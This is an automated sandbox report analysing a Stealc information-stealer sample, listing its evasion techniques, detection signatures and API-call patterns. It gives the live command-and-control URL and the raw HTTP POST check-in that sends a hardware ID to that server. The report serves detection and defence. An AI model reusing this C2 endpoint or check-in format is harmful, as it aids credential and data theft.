Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1559010
MD5:af00fae5bf606001c0c6ef0b98fb54d0
SHA1:a24fe73ec0b2d0190d3f6f068ca3c13a6cde4fd3
SHA256:8b1fbd75e6fcdf963260148537cae0d876130656c343518a5d7623937d4f0881
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 1228 cmdline: "C:\Users\user\Desktop\file.exe" MD5: AF00FAE5BF606001C0C6EF0B98FB54D0)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1519984196.0000000000F0E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1459234252.0000000004DA0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 1228JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 1228JoeSecurity_StealcYara detected StealcJoe Security
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-20T03:20:38.086111+010020442431Malware Command and Control Activity Detected192.168.2.749705185.215.113.20680TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: file.exeAvira: detected
              Source: http://185.215.113.206/c4becf79229cb002.phpktopAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.php/ugAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.phpaoNwAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.phpmoZwAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.phpyo&wAvira URL Cloud: Label: malware
              Source: http://185.215.113.206/c4becf79229cb002.php/PgAvira URL Cloud: Label: malware
              Source: file.exe.1228.0.memstrminMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: file.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_003A4C50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C40B0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_003C40B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A60D0 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,lstrlen,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_003A60D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B6960 lstrcpy,SHGetFolderPathA,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,LocalAlloc,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_003B6960
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003AEA30 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,0_2_003AEA30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A9B20 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_003A9B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B6B79 lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetProcessHeap,RtlAllocateHeap,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,StrStrA,lstrlen,lstrcpy,lstrcpy,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrlen,lstrlen,lstrlen,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,0_2_003B6B79
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A9B80 CryptUnprotectData,LocalAlloc,LocalFree,0_2_003A9B80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A7750 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_003A7750
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003B18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003B3910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003BE210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003B1269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003B1250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003B4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003B4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003B23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003ADB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003ADB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003B2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_003B2390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003ADB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003ADB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003BCBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_003BDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003BD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_003BD530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003A16B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003A16A0

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.7:49705 -> 185.215.113.206:80
              Source: Malware configuration extractorURLs: http://185.215.113.206/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIEGCBKEGCFCBFIDBFIIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 44 36 46 44 43 37 32 37 33 43 32 30 30 32 32 39 35 36 32 30 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 2d 2d 0d 0a Data Ascii: ------FIEGCBKEGCFCBFIDBFIIContent-Disposition: form-data; name="hwid"12D6FDC7273C2002295620------FIEGCBKEGCFCBFIDBFIIContent-Disposition: form-data; name="build"mars------FIEGCBKEGCFCBFIDBFII--
              Source: Joe Sandbox ViewIP Address: 185.215.113.206 185.215.113.206
              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.206
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A4C50 lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,InternetOpenA,StrCmpCA,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,InternetConnectA,HttpOpenRequestA,lstrcpy,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,lstrlen,lstrcpy,lstrcat,lstrcpy,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,0_2_003A4C50
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
              Source: unknownHTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIEGCBKEGCFCBFIDBFIIHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 32 44 36 46 44 43 37 32 37 33 43 32 30 30 32 32 39 35 36 32 30 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 49 45 47 43 42 4b 45 47 43 46 43 42 46 49 44 42 46 49 49 2d 2d 0d 0a Data Ascii: ------FIEGCBKEGCFCBFIDBFIIContent-Disposition: form-data; name="hwid"12D6FDC7273C2002295620------FIEGCBKEGCFCBFIDBFIIContent-Disposition: form-data; name="build"mars------FIEGCBKEGCFCBFIDBFII--
              Source: file.exe, 00000000.00000002.1519984196.0000000000F0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206
              Source: file.exe, 00000000.00000002.1519984196.0000000000F53000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
              Source: file.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/L
              Source: file.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
              Source: file.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/Pg
              Source: file.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/ug
              Source: file.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpaoNw
              Source: file.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpktop
              Source: file.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpmoZw
              Source: file.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpyo&w
              Source: file.exe, 00000000.00000002.1519984196.0000000000F6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/ws
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003A9770 memset,memset,lstrcat,lstrcat,lstrcat,memset,wsprintfA,OpenDesktopA,CreateDesktopA,lstrcat,lstrcat,lstrcat,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlen,wsprintfA,lstrcpy,Sleep,CloseDesktop,0_2_003A9770

              System Summary

              barindex
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075A82F0_2_0075A82F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C48B00_2_003C48B0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0076317B0_2_0076317B
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0075F94F0_2_0075F94F
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D99F60_2_006D99F6
